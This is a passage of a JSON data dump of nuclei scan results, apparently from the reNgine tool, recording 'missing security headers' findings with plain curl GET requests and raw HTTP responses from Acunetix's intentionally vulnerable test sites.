en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 587, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:41:28.304Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 588, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:28.443Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 589, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Entries", + "discovered_date": "2024-11-13T02:41:28.591Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Entries HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4dca64a4-1"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\n ", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 590, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:28.737Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 591, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:41:28.878Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 592, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:29.029Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 593, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:29.178Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 594, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:41:29.324Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 595, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": 